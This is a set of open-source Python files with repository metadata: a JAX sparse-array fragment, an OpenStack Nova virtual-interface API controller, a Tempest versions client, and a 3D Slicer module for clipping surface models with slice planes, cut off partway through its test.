return bcsr_todense(self)
@classmethod
def from_scipy_sparse(cls, mat, *, index_dtype=None, n_dense=0, n_batch=0):
"""Create a BCSR array from a :mod:`scipy.sparse` array."""
if n_dense != 0 or n_batch != 0:
raise NotImplementedError("BCSR from_scipy_sparse with nonzero n_dense/n_batch.")
if mat.ndim != 2:
raise ValueError(f"BCSR from_scipy_sparse requires 2D array; {mat.ndim}D is given.")
mat = mat.tocsr()
data = jnp.asarray(mat.data)
indices = jnp.asarray(mat.indices).astype(index_dtype or jnp.int32)
indptr = jnp.asarray(mat.indptr).astype(index_dtype or jnp.int32)
return cls((data, indices, indptr), shape=mat.shape)
#--------------------------------------------------------------------
# vmappable handlers
def _bcsr_to_elt(cont, _, val, axis):
if axis is None:
return val
if axis >= val.n_batch:
raise ValueError(f"Cannot map in_axis={axis} for BCSR array with n_batch="
f"{val.n_batch}. in_axes for batched BCSR operations must "
"correspond to a batched dimension.")
return BCSR((cont(val.data, axis),
cont(val.indices, axis),
cont(val.indptr, axis)),
shape=val.shape[:axis] + val.shape[axis + 1:])
def _bcsr_from_elt(cont, axis_size, elt, axis):
if axis > elt.n_batch:
raise ValueError(f"BCSR: cannot add out_axis={axis} for BCSR array with "
f"n_batch={elt.n_batch}. BCSR batch axes must be a "
"contiguous block of leading dimensions.")
return BCSR((cont(axis_size, elt.data, axis),
cont(axis_size, elt.indices, axis),
cont(axis_size, elt.indptr, axis)),
shape=elt.shape[:axis] + (axis_size,) + elt.shape[axis:])
batching.register_vmappable(BCSR, int, int, _bcsr_to_elt, _bcsr_from_elt, None)
| {
"content_hash": "727e00dcdbf6b5f0c7353e5fe1631e5a",
"timestamp": "",
"source": "github",
"line_count": 406,
"max_line_length": 111,
"avg_line_length": 37.39408866995074,
"alnum_prop": 0.6352259254380187,
"repo_name": "google/jax",
"id": "cde8024d2cc577a927ea81c1cbd002e5a05dd0ec",
"size": "15764",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "jax/experimental/sparse/bcsr.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "25710"
},
{
"name": "C++",
"bytes": "233622"
},
{
"name": "Dockerfile",
"bytes": "1514"
},
{
"name": "Jupyter Notebook",
"bytes": "98807"
},
{
"name": "Python",
"bytes": "7395044"
},
{
"name": "Shell",
"bytes": "17273"
},
{
"name": "Starlark",
"bytes": "88279"
}
],
"symlink_target": ""
} |
"""The virtual interfaces extension."""
import webob
from nova.api.openstack import api_version_request
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.i18n import _
from nova import network
from nova.policies import virtual_interfaces as vif_policies
ALIAS = 'os-virtual-interfaces'
def _translate_vif_summary_view(req, vif):
"""Maps keys for VIF summary view."""
d = {}
d['id'] = vif.uuid
d['mac_address'] = vif.address
if api_version_request.is_supported(req, min_version='2.12'):
d['net_id'] = vif.net_uuid
# NOTE(gmann): This is for v2.1 compatible mode where response should be
# same as v2 one.
if req.is_legacy_v2():
d['OS-EXT-VIF-NET:net_id'] = vif.net_uuid
return d
class ServerVirtualInterfaceController(wsgi.Controller):
"""The instance VIF API controller for the OpenStack API.
This API is deprecated from the Microversion '2.44'.
"""
def __init__(self):
self.compute_api = compute.API()
self.network_api = network.API()
super(ServerVirtualInterfaceController, self).__init__()
def _items(self, req, server_id, entity_maker):
"""Returns a list of VIFs, transformed through entity_maker."""
context = req.environ['nova.context']
context.can(vif_policies.BASE_POLICY_NAME)
instance = common.get_instance(self.compute_api, context, server_id)
try:
vifs = self.network_api.get_vifs_by_instance(context, instance)
except NotImplementedError:
msg = _('Listing virtual interfaces is not supported by this '
'cloud.')
raise webob.exc.HTTPBadRequest(explanation=msg)
limited_list = common.limited(vifs, req)
res = [entity_maker(req, vif) for vif in limited_list]
return {'virtual_interfaces': res}
@wsgi.Controller.api_version("2.1", "2.43")
@extensions.expected_errors((400, 404))
def index(self, req, server_id):
"""Returns the list of VIFs for a given instance."""
return self._items(req, server_id,
entity_maker=_translate_vif_summary_view)
class VirtualInterfaces(extensions.V21APIExtensionBase):
"""Virtual interface support."""
name = "VirtualInterfaces"
alias = ALIAS
version = 1
def get_resources(self):
resources = []
res = extensions.ResourceExtension(
ALIAS,
controller=ServerVirtualInterfaceController(),
parent=dict(member_name='server', collection_name='servers'))
resources.append(res)
return resources
def get_controller_extensions(self):
return []
| {
"content_hash": "54c508e29d833556525d1ce19962f934",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 76,
"avg_line_length": 32.26744186046512,
"alnum_prop": 0.6497297297297298,
"repo_name": "rajalokan/nova",
"id": "6b59e9472246a56380e936b7898bcbc7a71ab13e",
"size": "3406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/virtual_interfaces.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "601"
},
{
"name": "PHP",
"bytes": "4503"
},
{
"name": "Python",
"bytes": "19100322"
},
{
"name": "Shell",
"bytes": "26793"
},
{
"name": "Smarty",
"bytes": "299237"
}
],
"symlink_target": ""
} |
from oslo_serialization import jsonutils as json
from tempest.lib.common import rest_client
class VersionsClient(rest_client.RestClient):
api_version = "v2"
def list_versions(self):
"""List API versions"""
version_url = self._get_base_version_url()
resp, body = self.raw_request(version_url, 'GET')
self._error_checker(resp, body)
self.expected_success(300, resp.status)
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def has_version(self, version):
"""Return True if a version is supported."""
version = 'v%s' % version
supported = ['SUPPORTED', 'CURRENT']
versions = self.list_versions()
for version_struct in versions['versions']:
if version_struct['id'] == version:
return version_struct['status'] in supported
return False
| {
"content_hash": "75a5d416fe6be650b3ce21e0509e7203",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 60,
"avg_line_length": 32.142857142857146,
"alnum_prop": 0.6255555555555555,
"repo_name": "openstack/tempest",
"id": "98b4fb6209806dba6bc60313c17c18a9da7dc15d",
"size": "1531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/lib/services/image/v2/versions_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5364077"
},
{
"name": "Shell",
"bytes": "8684"
}
],
"symlink_target": ""
} |
from __main__ import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
import os
import numpy
import pickle
import json
#
# Load Files
#
class EasyClip(ScriptedLoadableModule):
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
parent.title = "Easy Clip"
parent.categories = ["Surface Models"]
parent.dependencies = []
parent.contributors = ["Julia Lopinto, (University Of Michigan)", "Jean-Baptiste Vimort, (University Of Michigan)"]
parent.helpText = """
This Module is used to clip one or different 3D Models according to a predetermined plane.
Plane can be saved to be reused for other models.
After clipping, the models are closed and can be saved as new 3D Models.
This is an alpha version of the module.
It can't be used for the moment.
"""
parent.acknowledgementText = """
This work was supported by the National
Institutes of Dental and Craniofacial Research
and Biomedical Imaging and Bioengineering of
the National Institutes of Health under Award
Number R01DE024450.
"""
self.parent = parent
class EasyClipWidget(ScriptedLoadableModuleWidget):
def setup(self):
ScriptedLoadableModuleWidget.setup(self)
print("-------Easy Clip Widget Setup---------")
# GLOBALS:
self.logic = EasyClipLogic(self)
self.ignoredNodeNames = ('Red Volume Slice', 'Yellow Volume Slice', 'Green Volume Slice')
self.colorSliceVolumes = dict()
self.dictionnaryModel = dict()
self.hardenModelIDdict = dict()
self.landmarkDescriptionDict = dict()
self.planeControlsDictionary = {}
# Instantiate and connect widgets
#
# Interface
#
loader = qt.QUiLoader()
moduleName = 'EasyClip'
scriptedModulesPath = eval('slicer.modules.%s.path' % moduleName.lower())
scriptedModulesPath = os.path.dirname(scriptedModulesPath)
path = os.path.join(scriptedModulesPath, 'Resources', 'UI', '%s.ui' %moduleName)
qfile = qt.QFile(path)
qfile.open(qt.QFile.ReadOnly)
widget = loader.load(qfile, self.parent)
self.layout = self.parent.layout()
self.widget = widget
self.layout.addWidget(widget)
##--------------------------- Scene --------------------------#
self.SceneCollapsibleButton = self.logic.get("SceneCollapsibleButton") # this atribute is usefull for Longitudinal quantification extension
treeView = self.logic.get("treeView")
treeView.setMRMLScene(slicer.app.mrmlScene())
treeView.sceneModel().setHorizontalHeaderLabels(["Models"])
treeView.sortFilterProxyModel().nodeTypes = ['vtkMRMLModelNode']
treeView.header().setVisible(False)
self.autoChangeLayout = self.logic.get("autoChangeLayout")
self.computeBox = self.logic.get("computeBox")
self.computeBox.connect('clicked()', self.onComputeBox)
#--------------------------- Clipping Part --------------------------#
# CLIPPING BUTTONS
self.red_plane_box = self.logic.get("red_plane_box")
self.radio_red_Neg = self.logic.get("radio_red_Neg")
self.radio_red_Neg.setIcon(qt.QIcon(":/Icons/RedSpaceNegative.png"))
self.radio_red_Pos = self.logic.get("radio_red_Pos")
self.radio_red_Pos.setIcon(qt.QIcon(":/Icons/RedSpacePositive.png"))
self.red_plane_box.connect('clicked(bool)', lambda: self.logic.onCheckBoxClicked('Red',
self.red_plane_box,
self.radio_red_Neg))
self.red_plane_box.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeRed",
self.red_plane_box.isChecked(),
self.radio_red_Neg.isChecked(),
self.radio_red_Pos.isChecked()))
self.radio_red_Neg.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeRed",
self.red_plane_box.isChecked(),
self.radio_red_Neg.isChecked(),
self.radio_red_Pos.isChecked()))
self.radio_red_Pos.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeRed",
self.red_plane_box.isChecked(),
self.radio_red_Neg.isChecked(),
self.radio_red_Pos.isChecked()))
self.yellow_plane_box = self.logic.get("yellow_plane_box")
self.radio_yellow_Neg= self.logic.get("radio_yellow_Neg")
self.radio_yellow_Neg.setIcon(qt.QIcon(":/Icons/YellowSpaceNegative.png"))
self.radio_yellow_Pos = self.logic.get("radio_yellow_Pos")
self.radio_yellow_Pos.setIcon(qt.QIcon(":/Icons/YellowSpacePositive.png"))
self.yellow_plane_box.connect('clicked(bool)', lambda: self.logic.onCheckBoxClicked('Yellow',
self.yellow_plane_box,
self.radio_yellow_Neg))
self.yellow_plane_box.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeYellow",
self.yellow_plane_box.isChecked(),
self.radio_yellow_Neg.isChecked(),
self.radio_yellow_Pos.isChecked()))
self.radio_yellow_Neg.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeYellow",
self.yellow_plane_box.isChecked(),
self.radio_yellow_Neg.isChecked(),
self.radio_yellow_Pos.isChecked()))
self.radio_yellow_Pos.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeYellow",
self.yellow_plane_box.isChecked(),
self.radio_yellow_Neg.isChecked(),
self.radio_yellow_Pos.isChecked()))
self.green_plane_box = self.logic.get("green_plane_box")
self.radio_green_Neg= self.logic.get("radio_green_Neg")
self.radio_green_Neg.setIcon(qt.QIcon(":/Icons/GreenSpaceNegative.png"))
self.radio_green_Pos = self.logic.get("radio_green_Pos")
self.radio_green_Pos.setIcon(qt.QIcon(":/Icons/GreenSpacePositive.png"))
self.green_plane_box.connect('clicked(bool)', lambda: self.logic.onCheckBoxClicked('Green',
self.green_plane_box,
self.radio_green_Neg))
self.green_plane_box.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeGreen",
self.green_plane_box.isChecked(),
self.radio_green_Neg.isChecked(),
self.radio_green_Pos.isChecked()))
self.radio_green_Neg.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeGreen",
self.green_plane_box.isChecked(),
self.radio_green_Neg.isChecked(),
self.radio_green_Pos.isChecked()))
self.radio_green_Pos.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeGreen",
self.green_plane_box.isChecked(),
self.radio_green_Neg.isChecked(),
self.radio_green_Pos.isChecked()))
self.ClippingButton = self.logic.get("ClippingButton")
self.ClippingButton.connect('clicked()', self.ClippingButtonClicked)
self.UndoButton = self.logic.get("UndoButton")
self.UndoButton.connect('clicked()', self.UndoButtonClicked)
# -------------------------------- PLANES --------------------------------#
self.CollapsibleButton3 = self.logic.get("CollapsibleButton3")
self.save = self.logic.get("save")
self.read = self.logic.get("read")
self.save.connect('clicked(bool)', self.savePlane)
self.read.connect('clicked(bool)', self.readPlane)
#-------------------- onCloseScene ----------------------#
slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene)
def onCloseScene(self, obj, event):
self.colorSliceVolumes = dict()
for key in self.logic.ColorNodeCorrespondence:
self.logic.planeDict[self.logic.ColorNodeCorrespondence[key]] = self.logic.planeDef()
self.UndoButton.enabled = False
def enter(self):
if self.autoChangeLayout.isChecked():
lm = slicer.app.layoutManager()
self.currentLayout = lm.layout
lm.setLayout(4) # 3D-View
# Show manual planes
for planeControls in self.planeControlsDictionary.values():
if planeControls.PlaneIsDefined():
planeControls.logic.planeLandmarks(planeControls.landmark1ComboBox.currentIndex, planeControls.landmark2ComboBox.currentIndex,
planeControls.landmark3ComboBox.currentIndex, planeControls.slider.value, planeControls.slideOpacity.value)
# Checking the names of the fiducials
list = slicer.mrmlScene.GetNodesByClass("vtkMRMLMarkupsFiducialNode")
end = list.GetNumberOfItems()
for i in range(0,end):
fidList = list.GetItemAsObject(i)
landmarkDescription = self.logic.decodeJSON(fidList.GetAttribute("landmarkDescription"))
if landmarkDescription:
for n in range(fidList.GetNumberOfMarkups()):
markupID = fidList.GetNthMarkupID(n)
markupLabel = fidList.GetNthMarkupLabel(n)
landmarkDescription[markupID]["landmarkLabel"] = markupLabel
fidList.SetAttribute("landmarkDescription",self.logic.encodeJSON(landmarkDescription))
self.onComputeBox()
self.logic.onCheckBoxClicked('Red', self.red_plane_box, self.radio_red_Neg)
self.logic.onCheckBoxClicked('Green', self.green_plane_box, self.radio_green_Neg)
self.logic.onCheckBoxClicked('Yellow', self.yellow_plane_box, self.radio_yellow_Neg)
def exit(self):
# Remove hidden nodes that are created just for Angle Planes
for x in self.colorSliceVolumes.values():
node = slicer.mrmlScene.GetNodeByID(x)
slicer.mrmlScene.RemoveNode(node)
node.SetHideFromEditors(False)
self.colorSliceVolumes = dict()
# Hide manual planes
for planeControls in self.planeControlsDictionary.values():
if planeControls.PlaneIsDefined():
planeControls.logic.planeLandmarks(planeControls.landmark1ComboBox.currentIndex, planeControls.landmark2ComboBox.currentIndex,
planeControls.landmark3ComboBox.currentIndex, planeControls.slider.value, 0)
# Hide planes
for x in self.logic.ColorNodeCorrespondence.keys():
compNode = slicer.util.getNode('vtkMRMLSliceCompositeNode' + x)
compNode.SetLinkedControl(False)
slice = slicer.mrmlScene.GetNodeByID(self.logic.ColorNodeCorrespondence[x])
slice.SetWidgetVisible(False)
slice.SetSliceVisible(False)
# Reset layout
if self.autoChangeLayout.isChecked():
lm = slicer.app.layoutManager()
if lm.layout == 4: # the user has not manually changed the layout
lm.setLayout(self.currentLayout)
def savePlane(self):
self.logic.getCoord()
self.logic.saveFunction()
def readPlane(self):
# Load plane matrix/function
self.logic.readPlaneFunction()
def UndoButtonClicked(self):
print("undo:")
print(self.dictionnaryModel)
self.UndoButton.enabled = False
for key,value in self.dictionnaryModel.items():
model = slicer.mrmlScene.GetNodeByID(key)
model.SetAndObservePolyData(value)
for key,value in self.hardenModelIDdict.items():
fidList = slicer.mrmlScene.GetNodeByID(key)
fidList.SetAttribute("hardenModelID", value)
for key,value in self.modelIDdict.items():
fidList = slicer.mrmlScene.GetNodeByID(key)
fidList.SetAttribute("connectedModelID", value)
for key,value in self.landmarkDescriptionDict.items():
fidList = slicer.mrmlScene.GetNodeByID(key)
fidList.SetAttribute("landmarkDescription",value)
def onComputeBox(self):
#--------------------------- Box around the model --------------------------#
positionOfVisibleNodes = self.getPositionOfModelNodes(True)
if len(positionOfVisibleNodes) == 0:
return
try:
maxValue = slicer.sys.float_info.max
except:
maxValue = self.logic.sys.float_info.max
bound = [maxValue, -maxValue, maxValue, -maxValue, maxValue, -maxValue]
for i in positionOfVisibleNodes:
node = slicer.mrmlScene.GetNthNodeByClass(i, "vtkMRMLModelNode")
model = self.logic.createIntermediateHardenModel(node)
polydata = model.GetPolyData()
if polydata is None or not hasattr(polydata, "GetBounds"):
continue
tempbound = polydata.GetBounds()
bound[0] = min(bound[0], tempbound[0])
bound[2] = min(bound[2], tempbound[2])
bound[4] = min(bound[4], tempbound[4])
bound[1] = max(bound[1], tempbound[1])
bound[3] = max(bound[3], tempbound[3])
bound[5] = max(bound[5], tempbound[5])
# --------------------------- Box around the model --------------------------#
dim = []
origin = []
for x in range(0, 3):
dim.append(bound[x * 2 + 1] - bound[x * 2])
origin.append(bound[x * 2] + dim[x] / 2)
dim[x] *= 1.1
dictColors = {'Red': 32, 'Yellow': 15, 'Green': 1}
for x in dictColors.keys():
sampleVolumeNode = self.CreateNewNode(x, dictColors[x], dim, origin)
compNode = slicer.util.getNode('vtkMRMLSliceCompositeNode' + x)
compNode.SetLinkedControl(False)
compNode.SetBackgroundVolumeID(sampleVolumeNode.GetID())
lm = slicer.app.layoutManager()
#Reset and fit 2D-views
lm.resetSliceViews()
for x in dictColors.keys():
logic = lm.sliceWidget(x)
node = logic.mrmlSliceNode()
node.SetSliceResolutionMode(node.SliceResolutionMatch2DView)
logic.fitSliceToBackground()
#Reset pink box around models
for i in range(0, lm.threeDViewCount):
threeDView = lm.threeDWidget(i).threeDView()
threeDView.resetFocalPoint()
#Reset camera in 3D view to center the models and position the camera so that all actors can be seen
threeDView.renderWindow().GetRenderers().GetFirstRenderer().ResetCamera()
def getPositionOfModelNodes(self, onlyVisible):
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
positionOfNodes = list()
for i in range(0, numNodes):
node = slicer.mrmlScene.GetNthNodeByClass(i, "vtkMRMLModelNode")
if node.GetName() in self.ignoredNodeNames:
continue
if onlyVisible is True and node.GetDisplayVisibility() == 0:
continue
positionOfNodes.append(i)
return positionOfNodes
def CreateNewNode(self, colorName, color, dim, origin):
# we add a pseudo-random number to the name of our empty volume to avoid the risk of having a volume called
# exactly the same by the user which could be confusing. We could also have used slicer.app.sessionId()
if colorName not in self.colorSliceVolumes.keys():
VolumeName = "EasyClip_EmptyVolume_" + str(slicer.app.applicationPid()) + "_" + colorName
# Do NOT set the spacing and the origin of imageData (vtkImageData)
# The spacing and the origin should only be set in the vtkMRMLScalarVolumeNode!!!!!!
# We only create an image of 1 voxel (as we only use it to color the planes
imageData = vtk.vtkImageData()
imageData.SetDimensions(1, 1, 1)
imageData.AllocateScalars(vtk.VTK_UNSIGNED_CHAR, 1)
imageData.SetScalarComponentFromDouble(0, 0, 0, 0, color)
if hasattr(slicer, 'vtkMRMLLabelMapVolumeNode'):
sampleVolumeNode = slicer.vtkMRMLLabelMapVolumeNode()
else:
sampleVolumeNode = slicer.vtkMRMLScalarVolumeNode()
sampleVolumeNode = slicer.mrmlScene.AddNode(sampleVolumeNode)
sampleVolumeNode.SetName(VolumeName)
labelmapVolumeDisplayNode = slicer.vtkMRMLLabelMapVolumeDisplayNode()
slicer.mrmlScene.AddNode(labelmapVolumeDisplayNode)
colorNode = slicer.util.getNode('GenericAnatomyColors')
labelmapVolumeDisplayNode.SetAndObserveColorNodeID(colorNode.GetID())
sampleVolumeNode.SetAndObserveImageData(imageData)
sampleVolumeNode.SetAndObserveDisplayNodeID(labelmapVolumeDisplayNode.GetID())
labelmapVolumeDisplayNode.VisibilityOff()
self.colorSliceVolumes[colorName] = sampleVolumeNode.GetID()
sampleVolumeNode = slicer.mrmlScene.GetNodeByID(self.colorSliceVolumes[colorName])
sampleVolumeNode.HideFromEditorsOn()
sampleVolumeNode.SetOrigin(origin[0], origin[1], origin[2])
sampleVolumeNode.SetSpacing(dim[0], dim[1], dim[2])
if not hasattr(slicer, 'vtkMRMLLabelMapVolumeNode'):
sampleVolumeNode.SetLabelMap(1)
sampleVolumeNode.SetHideFromEditors(True)
sampleVolumeNode.SetSaveWithScene(False)
return sampleVolumeNode
def ClippingButtonClicked(self):
self.logic.getCoord()
self.dictionnaryModel, self.modelIDdict, self.hardenModelIDdict, self.landmarkDescriptionDict\
= self.logic.clipping()
self.UndoButton.enabled = True
def updateSliceState(self, plane, boxState, negState, posState):
print("Update Slice State")
self.logic.planeDict[plane].boxState = boxState
self.logic.planeDict[plane].negState = negState
self.logic.planeDict[plane].posState = posState
class EasyClipLogic(ScriptedLoadableModuleLogic):
try:
slicer.sys
except:
import sys
class planeDef(object):
def __init__(self):
# Matrix that define each plane
self.matrix = None
# normal to the plane
self.n = None
# point in the plane
self.P = None
# Slice State
self.boxState = False
self.negState = False
self.posState = False
# Plane for cliping
self.vtkPlane = vtk.vtkPlane()
def __init__(self, interface):
self.interface = interface
self.ColorNodeCorrespondence = {'Red': 'vtkMRMLSliceNodeRed',
'Yellow': 'vtkMRMLSliceNodeYellow',
'Green': 'vtkMRMLSliceNodeGreen'}
self.get_normal = numpy.matrix([[0], [0], [1], [0]])
self.get_point = numpy.matrix([[0], [0], [0], [1]])
self.planeDict = dict()
for key in self.ColorNodeCorrespondence:
self.planeDict[self.ColorNodeCorrespondence[key]] = self.planeDef()
def get(self, objectName):
return self.findWidget(self.interface.widget, objectName)
def findWidget(self, widget, objectName):
if widget.objectName == objectName:
return widget
else:
for w in widget.children():
resulting_widget = self.findWidget(w, objectName)
if resulting_widget:
return resulting_widget
return None
def createIntermediateHardenModel(self, model):
hardenModel = slicer.mrmlScene.GetNodesByName("SurfaceRegistration_" + model.GetName() + "_hardenCopy_" + str(
slicer.app.applicationPid())).GetItemAsObject(0)
if hardenModel is None:
hardenModel = slicer.vtkMRMLModelNode()
hardenPolyData = vtk.vtkPolyData()
hardenPolyData.DeepCopy(model.GetPolyData())
hardenModel.SetAndObservePolyData(hardenPolyData)
hardenModel.SetName(
"SurfaceRegistration_" + model.GetName() + "_hardenCopy_" + str(slicer.app.applicationPid()))
if model.GetParentTransformNode():
hardenModel.SetAndObserveTransformNodeID(model.GetParentTransformNode().GetID())
hardenModel.HideFromEditorsOn()
slicer.mrmlScene.AddNode(hardenModel)
logic = slicer.vtkSlicerTransformLogic()
logic.hardenTransform(hardenModel)
return hardenModel
def onCheckBoxClicked(self, colorPlane, checkBox, radioButton ):
slice = slicer.util.getNode(self.ColorNodeCorrespondence[colorPlane])
print("Slice test", slice)
if checkBox.isChecked():
slice.SetWidgetVisible(True)
radioButton.setChecked(True)
else:
slice.SetWidgetVisible(False)
def getMatrix(self, slice):
mat = slice.GetSliceToRAS()
m = numpy.matrix([[mat.GetElement(0, 0), mat.GetElement(0, 1), mat.GetElement(0, 2), mat.GetElement(0, 3)],
[mat.GetElement(1, 0), mat.GetElement(1, 1), mat.GetElement(1, 2), mat.GetElement(1, 3)],
[mat.GetElement(2, 0), mat.GetElement(2, 1), mat.GetElement(2, 2), mat.GetElement(2, 3)],
[mat.GetElement(3, 0), mat.GetElement(3, 1), mat.GetElement(3, 2), mat.GetElement(3, 3)]])
return m
def getCoord(self):
for key, planeDef in self.planeDict.items():
planeDef.matrix = self.getMatrix(slicer.util.getNode(key))
planeDef.n = planeDef.matrix * self.get_normal
# print "n : \n", planeDef.n
planeDef.P = planeDef.matrix * self.get_point
# print "P : \n", planeDef.P
a = planeDef.n[0]
b = planeDef.n[1]
c = planeDef.n[2]
d = planeDef.n[0]*planeDef.P[0] + planeDef.n[1]*planeDef.P[1] + planeDef.n[2]*planeDef.P[2]
# print key + "plan equation : \n", a ,"* x + ", b , "* y + ", c , "* z - ", d ," = 0 "
def clipping(self):
planeCollection = vtk.vtkPlaneCollection()
harden = slicer.vtkSlicerTransformLogic()
tempTransform = slicer.vtkMRMLLinearTransformNode()
tempTransform.HideFromEditorsOn()
slicer.mrmlScene.AddNode(tempTransform)
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
dictionnaryModel = dict()
hardenModelIDdict = dict()
landmarkDescriptionDict = dict()
modelIDdict = dict()
for i in range(3, numNodes):
planeCollection.RemoveAllItems()
mh = slicer.mrmlScene.GetNthNodeByClass(i, "vtkMRMLModelNode")
if mh.GetDisplayVisibility() == 0:
continue
model = slicer.util.getNode(mh.GetName())
transform = model.GetParentTransformNode()
if transform:
tempTransform.Copy(transform)
harden.hardenTransform(tempTransform)
m = vtk.vtkMatrix4x4()
tempTransform.GetMatrixTransformToParent(m)
m.Invert(m, m)
else:
m = vtk.vtkMatrix4x4()
for key, planeDef in self.planeDict.items():
hardenP = m.MultiplyPoint(planeDef.P)
hardenN = m.MultiplyPoint(planeDef.n)
if planeDef.boxState:
planeDef.vtkPlane.SetOrigin(hardenP[0], hardenP[1], hardenP[2])
if planeDef.negState:
planeDef.vtkPlane.SetNormal(-hardenN[0], -hardenN[1], -hardenN[2])
if planeDef.posState:
planeDef.vtkPlane.SetNormal(hardenN[0], hardenN[1], hardenN[2])
planeCollection.AddItem(planeDef.vtkPlane)
dictionnaryModel[model.GetID()]= model.GetPolyData()
polyData = model.GetPolyData()
clipper = vtk.vtkClipClosedSurface()
clipper.SetClippingPlanes(planeCollection)
clipper.SetInputData(polyData)
clipper.SetGenerateFaces(1)
clipper.SetScalarModeToLabels()
clipper.Update()
polyDataNew = clipper.GetOutput()
model.SetAndObservePolyData(polyDataNew)
# Checking if one ore more fiducial list are connected to this model
list = slicer.mrmlScene.GetNodesByClass("vtkMRMLMarkupsFiducialNode")
end = list.GetNumberOfItems()
for i in range(0,end):
fidList = list.GetItemAsObject(i)
if fidList.GetAttribute("connectedModelID"):
if fidList.GetAttribute("connectedModelID") == model.GetID():
modelIDdict[fidList.GetID()], hardenModelIDdict[fidList.GetID()], landmarkDescriptionDict[fidList.GetID()] = \
self.unprojectLandmarks(fidList)
return dictionnaryModel, modelIDdict, hardenModelIDdict, landmarkDescriptionDict
def unprojectLandmarks(self, fidList):
hardenModelID = fidList.GetAttribute("hardenModelID")
ModelID = fidList.GetAttribute("connectedModelID")
landmarkDescriptioncopy = fidList.GetAttribute("landmarkDescription")
fidList.SetAttribute("connectedModelID", None)
fidList.SetAttribute("hardenModelID", None)
landmarkDescription = self.decodeJSON(fidList.GetAttribute("landmarkDescription"))
for n in range(fidList.GetNumberOfMarkups()):
markupID = fidList.GetNthMarkupID(n)
landmarkDescription[markupID]["projection"]["isProjected"] = False
landmarkDescription[markupID]["projection"]["closestPointIndex"] = None
landmarkDescription[markupID]["ROIradius"] = 0
fidList.SetAttribute("landmarkDescription",self.encodeJSON(landmarkDescription))
return ModelID, hardenModelID, landmarkDescriptioncopy
def saveFunction(self):
filename = qt.QFileDialog.getSaveFileName(self.interface.parent, "Save file")
tempDictionary = {}
for key in self.ColorNodeCorrespondence:
slice = slicer.util.getNode(self.ColorNodeCorrespondence[key])
tempDictionary[key] = self.getMatrix(slice).tolist()
if filename is None:
filename = qt.QFileDialog.getSaveFileName(self.interface.parent, "Save file")
if filename != "":
fileObj = open(filename, "wb")
pickle.dump(tempDictionary, fileObj)
fileObj.close()
def readPlaneFunction(self):
filename = qt.QFileDialog.getOpenFileName(self.interface.parent, "Open file")
if filename is None:
filename = qt.QFileDialog.getOpenFileName(self.interface.parent, "Open file")
if filename != "":
fileObj = open(filename, "rb")
tempDictionary = pickle.load(fileObj)
for key in self.ColorNodeCorrespondence:
node = slicer.mrmlScene.GetNodeByID(self.ColorNodeCorrespondence[key])
matList = tempDictionary[key]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
node.UpdateMatrices()
fileObj.close()
def encodeJSON(self, input):
encodedString = json.dumps(input)
encodedString = encodedString.replace('\"', '\'')
return encodedString
def decodeJSON(self, input):
if input:
input = input.replace('\'','\"')
return self.byteify(json.loads(input))
return None
def byteify(self, input):
if isinstance(input, dict):
return {self.byteify(key):self.byteify(value) for key,value in input.items()}
elif isinstance(input, list):
return [self.byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
class EasyClipTest(ScriptedLoadableModuleTest):
def setUp(self):
# reset the state - clear scene
slicer.mrmlScene.Clear(0)
def runTest(self):
# run all tests needed
self.setUp()
self.test_EasyClip()
def test_EasyClip(self):
self.delayDisplay("Starting the test")
###################################################################################################
# Loading some data #
###################################################################################################
import urllib.request
downloads = (
('http://slicer.kitware.com/midas3/download?items=167065', 'model.vtk', slicer.util.loadModel),
)
for url,name,loader in downloads:
filePath = slicer.app.temporaryPath + '/' + name
if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:
print('Requesting download %s from %s...\n' % (name, url))
urllib.request.urlretrieve(url, filePath)
if loader:
print('Loading %s...\n' % (name,))
loader(filePath)
self.delayDisplay('Finished with download and loading\n')
layoutManager = slicer.app.layoutManager()
threeDWidget = layoutManager.threeDWidget(0)
threeDView = threeDWidget.threeDView()
threeDView.resetFocalPoint()
self.delayDisplay('Model loaded')
###################################################################################################
# Initialize Plane Position #
###################################################################################################
redslice = slicer.util.getNode('vtkMRMLSliceNodeRed')
yellowslice = slicer.util.getNode('vtkMRMLSliceNodeYellow')
greenslice = slicer.util.getNode('vtkMRMLSliceNodeGreen')
# print redslice, yellowslice, greenslice
self.delayDisplay('Planes are displayed!')
#Put planes at specific places
matRed = redslice.GetSliceToRAS()
matRed.SetElement(0,3,0)
matRed.SetElement(1,3,0)
matRed.SetElement(2,3,8)
redslice.SetWidgetVisible(True)
print(matRed)
matYellow = yellowslice.GetSliceToRAS()
matYellow.SetElement(0,3,-3)
matYellow.SetElement(1,3,0)
matYellow.SetElement(2,3,0)
